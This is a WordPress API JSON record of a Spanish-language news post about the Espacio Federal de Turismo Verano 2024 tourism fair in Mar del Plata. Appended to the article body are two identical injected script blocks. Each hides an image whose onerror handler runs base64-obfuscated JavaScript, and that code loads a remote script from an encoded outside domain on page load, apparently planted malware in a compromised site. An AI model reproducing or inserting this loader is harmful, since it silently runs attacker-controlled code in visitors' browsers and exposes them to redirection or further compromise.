{"id":3643,"date":"2024-02-07T20:12:56","date_gmt":"2024-02-07T23:12:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3643"},"modified":"2025-08-14T00:01:06","modified_gmt":"2025-08-14T03:01:06","slug":"el-espacio-federal-de-turismo-verano-2024-muestra-parte-de-la-gran-oferta-turistica-del-pais","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3643","title":{"rendered":"El Espacio Federal de Turismo Verano 2024 muestra parte de la gran oferta tur\u00edstica del pa\u00eds"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-black-color has-text-color has-background has-link-color wp-elements-1e0e227fa94a590bf776b187e9fbb5cc\" style=\"background-color:#02bd62\"><em>En Mar del Plata, el Consejo Federal de Turismo, junto a la Subsecretar\u00eda de Turismo del Ministerio del Interior de la Naci\u00f3n, organiza el Espacio Federal de Turismo Verano 2024, con el objetivo de brindar a las provincias un lugar para mostrar su oferta tur\u00edstica. En la apertura de las jornadas, FEHGRA estuvo presente representada por el dirigente Juan Ignacio Serra.<\/em><\/h5>\n\n\n\n<p>El martes 30 de enero se llev\u00f3 a cabo el acto de apertura de la propuesta, que fue encabezado por Sebasti\u00e1n Giobellina, presidente del Consejo Federal de Turismo; y Romina Sorrentino, de la subsecretaria de Turismo de la Naci\u00f3n. Acompa\u00f1\u00f3 el coordinador de la Regi\u00f3n Provincia de Buenos Aires de FEHGRA, Juan Ignacio Serra.<\/p>\n\n\n\n<p>En la emblem\u00e1tica Plaza del Agua en Mar del Plata, uno de los paseos m\u00e1s concurridos de la ciudad, los visitantes puedan disfrutar de las variadas propuestas del 25 de enero al 13 de febrero, todos los d\u00edas de 19 a 23 horas, con excepci\u00f3n de los d\u00edas 9 y 10 de febrero en los que no habr\u00e1 actividades.<\/p>\n\n\n\n<p><em>Cronograma de actividades: <a href=\"https:\/\/espaciofederal.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/espaciofederal.ar\/<\/a><\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"377\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_20739_espaciofederal.ar_-1024x377.jpeg\" alt=\"\" class=\"wp-image-3644\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_20739_espaciofederal.ar_-1024x377.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_20739_espaciofederal.ar_-300x110.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_20739_espaciofederal.ar_-768x283.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_20739_espaciofederal.ar_-1536x566.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_20739_espaciofederal.ar_-696x256.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_20739_espaciofederal.ar_-1068x393.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_20739_espaciofederal.ar_-1141x420.jpeg 1141w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_20739_espaciofederal.ar_.jpeg 1722w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En Mar del Plata, el Consejo Federal de Turismo, junto a la Subsecretar\u00eda de Turismo del Ministerio del Interior de la Naci\u00f3n, organiza el Espacio Federal de Turismo Verano 2024, con el objetivo de brindar a las provincias un lugar para mostrar su oferta tur\u00edstica. En la apertura de las jornadas, FEHGRA estuvo presente representada [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3645,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-3643","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3643"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3643"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3643\/revisions"}],"predecessor-version":[{"id":6859,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3643\/revisions\/6859"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3645"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3643"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3643"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3643"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}